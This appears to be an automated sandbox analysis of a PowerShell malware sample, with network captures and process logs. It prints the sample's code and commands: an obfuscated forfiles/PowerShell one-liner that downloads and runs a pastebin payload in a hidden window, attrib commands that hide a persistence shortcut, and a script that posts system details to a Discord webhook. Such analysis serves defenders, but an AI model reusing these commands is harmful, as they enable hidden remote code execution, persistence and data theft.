                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 16:06:48 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210063-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729008409.742171,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: 22e6ac019fedea85b37ccd34cf58118e8d53f4c5
                                                                Expires: Tue, 15 Oct 2024 16:11:48 GMT
                                                                Source-Age: 108
                                                                2024-10-15 16:06:48 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 16:06:48 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 16:06:48 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 16:06:48 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 16:06:48 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 16:06:48 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.1049716162.159.137.2324431076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 16:06:53 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 298
                                                                Connection: Keep-Alive
                                                                2024-10-15 16:06:53 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4c 59 55 4b 56 59 39 5f 4f 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** LYUKVY9_O\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                2024-10-15 16:06:53 UTC1255INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 16:06:53 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729008415
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3leWqN14%2FTPEpUhVQS2W5kgNjg7eNUeIlw8bN8%2FjzlRkCzrp5FYXMwVlnGDxrr67C2voq5M2oDjsvQvRbeo0GQmJSMK9Wh3CZ%2BkyJ3lObSJGFfNhOaMceY4Idpl"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=9aa4de5b91cddf0f78aad7617e140b1244fb685a-1729008413; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=HL6qoEi9AUK1QXMCmD6wtLxQOptKFF.UZiBr_yfuJog-1729008413880-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d310f1a0d9be946-DFW
                                                                2024-10-15 16:06:53 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.1049717162.159.137.2324434084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 16:07:01 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 298
                                                                Connection: Keep-Alive
                                                                2024-10-15 16:07:01 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4c 59 55 4b 56 59 39 5f 4f 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** LYUKVY9_O\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                2024-10-15 16:07:02 UTC1253INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 16:07:02 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729008423
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8de1sjzd5G6xecmQ350B52qWhJI4YwgZvvNiBHoduMzzOpBKOAQSpj5cRxooxa4yrnYTejqW2WestQuMuSBpe7XCUBMkDBk7zxQoRKOhW9vd6%2B7j%2BF1JGU0KdLZg"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=dee6a8c890f1452258eff67aae95b99f1a197834-1729008422; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=Xcn4G42yntjKFoikxVo6LrIXjEz.GaCtSY.BlUm1KHM-1729008422076-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d310f4d3c922cb2-DFW
                                                                2024-10-15 16:07:02 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:12:06:12
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1"
                                                                Imagebase:0x7ff7b2bb0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:12:06:12
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff620390000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:12:06:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\forfiles.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                Imagebase:0x7ff78e830000
                                                                File size:52'224 bytes
                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:12:06:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff620390000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:12:06:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                Imagebase:0x7ff7b2bb0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:12:06:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                Imagebase:0x7ff7b2bb0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:12:06:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                Imagebase:0x7ff672800000
                                                                File size:23'040 bytes
                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:12:06:43
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\forfiles.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                Imagebase:0x7ff78e830000
                                                                File size:52'224 bytes
                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:12:06:43
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff620390000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:12:06:43
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                Imagebase:0x7ff7b2bb0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:12:06:43
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                Imagebase:0x7ff7b2bb0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:2.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 9855 7ff7c00f8dc4 9856 7ff7c00f8dcd LoadLibraryExW 9855->9856 9858 7ff7c00f8e7d 9856->9858

                                                                  Executed Functions

                                                                  Function 00007FF7C00ED7D6 Relevance: .5, Instructions: 474COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 24 7ff7c00ed7d6-7ff7c00ed7e3 25 7ff7c00ed7e5-7ff7c00ed7ed 24->25 26 7ff7c00ed7ee-7ff7c00ed8b7 24->26 25->26 29 7ff7c00ed923 26->29 30 7ff7c00ed8b9-7ff7c00ed8c2 26->30 31 7ff7c00ed925-7ff7c00ed94a 29->31 30->29 32 7ff7c00ed8c4-7ff7c00ed8d0 30->32 39 7ff7c00ed9b6 31->39 40 7ff7c00ed94c-7ff7c00ed955 31->40 33 7ff7c00ed8d2-7ff7c00ed8e4 32->33 34 7ff7c00ed909-7ff7c00ed921 32->34 36 7ff7c00ed8e6 33->36 37 7ff7c00ed8e8-7ff7c00ed8fb 33->37 34->31 36->37 37->37 38 7ff7c00ed8fd-7ff7c00ed905 37->38 38->34 42 7ff7c00ed9b8-7ff7c00eda60 39->42 40->39 41 7ff7c00ed957-7ff7c00ed963 40->41 43 7ff7c00ed965-7ff7c00ed977 41->43 44 7ff7c00ed99c-7ff7c00ed9b4 41->44 53 7ff7c00eda62-7ff7c00eda6c 42->53 54 7ff7c00edace 42->54 46 7ff7c00ed97b-7ff7c00ed98e 43->46 47 7ff7c00ed979 43->47 44->42 46->46 49 7ff7c00ed990-7ff7c00ed998 46->49 47->46 49->44 53->54 56 7ff7c00eda6e-7ff7c00eda7b 53->56 55 7ff7c00edad0-7ff7c00edaf9 54->55 62 7ff7c00edb63 55->62 63 7ff7c00edafb-7ff7c00edb06 55->63 57 7ff7c00edab4-7ff7c00edacc 56->57 58 7ff7c00eda7d-7ff7c00eda8f 56->58 57->55 60 7ff7c00eda93-7ff7c00edaa6 58->60 61 7ff7c00eda91 58->61 60->60 64 7ff7c00edaa8-7ff7c00edab0 60->64 61->60 66 7ff7c00edb65-7ff7c00edc0b 62->66 63->62 65 7ff7c00edb08-7ff7c00edb16 63->65 64->57 67 7ff7c00edb4f-7ff7c00edb61 65->67 68 7ff7c00edb18-7ff7c00edb2a 65->68 75 7ff7c00edc13-7ff7c00edc4d call 7ff7c00edc94 66->75 76 7ff7c00edc0d 66->76 67->66 69 7ff7c00edb2e-7ff7c00edb41 68->69 70 7ff7c00edb2c 68->70 69->69 72 7ff7c00edb43-7ff7c00edb4b 69->72 70->69 72->67 82 7ff7c00edc52-7ff7c00edc78 75->82 76->75 83 7ff7c00edc7f-7ff7c00edc93 82->83 84 7ff7c00edc7a 82->84 84->83
                                                                  Memory Dump Source
